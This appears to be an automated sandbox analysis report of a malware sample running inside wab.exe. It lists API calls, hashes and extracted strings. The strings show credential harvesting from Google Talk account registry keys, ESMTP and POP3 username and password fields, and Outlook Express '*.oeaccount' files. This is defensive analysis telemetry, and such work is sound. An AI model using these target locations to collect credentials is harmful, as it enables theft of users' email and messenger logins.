                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                            • String ID:
                                            • API String ID: 2054149589-0
                                            • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                            • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                            • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                            • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                              • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                              • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                            • memset.MSVCRT ref: 00408620
                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                            • memset.MSVCRT ref: 00408671
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                            • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                            Strings
                                            • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                            • String ID: Software\Google\Google Talk\Accounts
                                            • API String ID: 1366857005-1079885057
                                            • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                            • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                            • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                            • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 414 40ba28-40ba3a 415 40ba87-40ba9b call 406c62 414->415 416 40ba3c-40ba52 call 407e20 _mbsicmp 414->416 438 40ba9d call 4107f1 415->438 439 40ba9d call 404734 415->439 440 40ba9d call 404785 415->440 441 40ba9d call 403c16 415->441 442 40ba9d call 410a9c 415->442 421 40ba54-40ba6d call 407e20 416->421 422 40ba7b-40ba85 416->422 427 40ba74 421->427 428 40ba6f-40ba72 421->428 422->415 422->416 424 40baa0-40bab3 call 407e30 431 40bab5-40bac1 424->431 432 40bafa-40bb09 SetCursor 424->432 430 40ba75-40ba76 call 40b5e5 427->430 428->430 430->422 433 40bac3-40bace 431->433 434 40bad8-40baf7 qsort 431->434 433->434 434->432 438->424 439->424 440->424 441->424 442->424
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Cursor_mbsicmpqsort
                                            • String ID: /nosort$/sort
                                            • API String ID: 882979914-1578091866
                                            • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                            • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                            • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                            • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                            APIs
                                              • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                              • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                            • memset.MSVCRT ref: 00410E10
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                            • _mbscpy.MSVCRT ref: 00410E87
                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                            Strings
                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                            • API String ID: 889583718-2036018995
                                            • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                            • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                            • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                            • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                            APIs
                                            • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                            • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                            • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                            • LockResource.KERNEL32(00000000), ref: 00410CA1
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Resource$FindLoadLockSizeof
                                            • String ID:
                                            • API String ID: 3473537107-0
                                            • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                            • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                            • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                            • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                            APIs
                                            • memset.MSVCRT ref: 004109F7
                                              • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                              • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                            • memset.MSVCRT ref: 00410A32
                                            • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                            • String ID:
                                            • API String ID: 3143880245-0
                                            • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                            • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                            • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                            • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??2@
                                            • String ID:
                                            • API String ID: 1033339047-0
                                            • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                            • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                            • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                            • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@mallocmemcpy
                                            • String ID:
                                            • API String ID: 3831604043-0
                                            • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                            • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                            • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                            • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                            APIs
                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                            • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: CreateFontIndirect_mbscpymemset
                                            • String ID: Arial
                                            • API String ID: 3853255127-493054409
                                            • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                            • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                            • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                            • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                            • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                            • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                            APIs
                                              • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                            • _strcmpi.MSVCRT ref: 0040CEC3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: strlen$_strcmpimemset
                                            • String ID: /stext
                                            • API String ID: 520177685-3817206916
                                            • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                            • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                            • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                            • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                            • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                            • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                            APIs
                                            • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                            • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                            • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                            • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                            APIs
                                              • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                            • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Library$AddressFreeLoadProc
                                            • String ID:
                                            • API String ID: 145871493-0
                                            • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                            • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                            • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                            • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                            APIs
                                            • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                              • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                              • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                              • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: PrivateProfile$StringWrite_itoamemset
                                            • String ID:
                                            • API String ID: 4165544737-0
                                            • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                            • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                            • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                            • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                            APIs
                                            • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                            • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                            • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                            • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                            APIs
                                            • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                            • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                            • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                            • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                            APIs
                                            • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                            • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                            • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                            • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                            APIs
                                            • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: EnumNamesResource
                                            • String ID:
                                            • API String ID: 3334572018-0
                                            • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                            • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                            • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                            • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                            APIs
                                            • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: CloseFind
                                            • String ID:
                                            • API String ID: 1863332320-0
                                            • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                            • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                            • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                            • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                            • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                            • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                            • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                            APIs
                                            • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                            • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                            • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                            • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: PrivateProfileString_mbscmpstrlen
                                            • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                            • API String ID: 3963849919-1658304561
                                            • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                            • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                            • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                            • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                            APIs
                                            • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                            • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                            • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                            • LoadCursorA.USER32(00000067), ref: 0040115F
                                            • SetCursor.USER32(00000000,?,?), ref: 00401166
                                            • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                            • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                            • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                            • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                            • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                            • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                            • EndDialog.USER32(?,00000001), ref: 0040121A
                                            • DeleteObject.GDI32(?), ref: 00401226
                                            • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                            • ShowWindow.USER32(00000000), ref: 00401253
                                            • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                            • ShowWindow.USER32(00000000), ref: 00401262
                                            • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                            • memset.MSVCRT ref: 0040128E
                                            • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                            • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                            • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                            • String ID:
                                            • API String ID: 2998058495-0
                                            • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                            • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                            • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                            • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _mbscat$memsetsprintf$_mbscpy
                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                            • API String ID: 633282248-1996832678
                                            • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                            • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                            • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                            • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: sprintf$memset$_mbscpy
                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                            • API String ID: 3402215030-3842416460
                                            • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                            • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                            • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
